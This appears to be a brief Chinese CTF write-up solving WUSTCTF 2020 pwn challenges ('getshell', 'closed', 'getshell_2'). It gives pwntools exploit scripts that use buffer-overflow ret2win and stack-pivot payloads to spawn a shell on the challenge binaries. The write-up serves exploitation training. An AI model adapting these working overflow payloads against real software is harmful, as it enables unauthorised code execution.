今日在buu水水分,遇到了题目👴就顺便复现一下WUSTCTF
getshell
简单的ret2win
exp:
1 2 3 4 5 6 7 8 9 10 11 12
| from pwn import * context.log_level='debug' context.arch = 'i386'
p=remote('node3.buuoj.cn',25756) elf=ELF('./wustctf2020_getshell') backdoor=0x804851b
p.recv() payload='a'*0x1c+p32(backdoor) p.sendline(payload) p.interactive()
|
closed
直接提供shell,但是标准错误,标准输出流全关,需要将输出重定向到标准输入流
nc上之后直接
getshell_2
栈迁移:使用已有的read函数加上bss地址,由于没有其他字符串,可以用system(‘sh’)来getshell
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| from pwn import * context.log_level='debug' context.arch = 'i386' p=process('./wustctf2020_getshell_2')
elf=ELF('./wustctf2020_getshell_2') backdoor=0x804851b
sh_addr=0x8048670 read_addr=0x804858B read_addr_2=0x804858D system_addr=0x80483E0 bss=0x804a040+0x300 leave_ret=0x08048488 p.recv() payload='a'*0x18+p32(bss+0x18)+p32(read_addr) p.sendline(payload) payload='aaaa'+p32(system_addr)+p32(0)+p32(sh_addr)+p32(0)*2+p32(bss)+p32(leave_ret)
p.sendline(payload) p.interactive()
|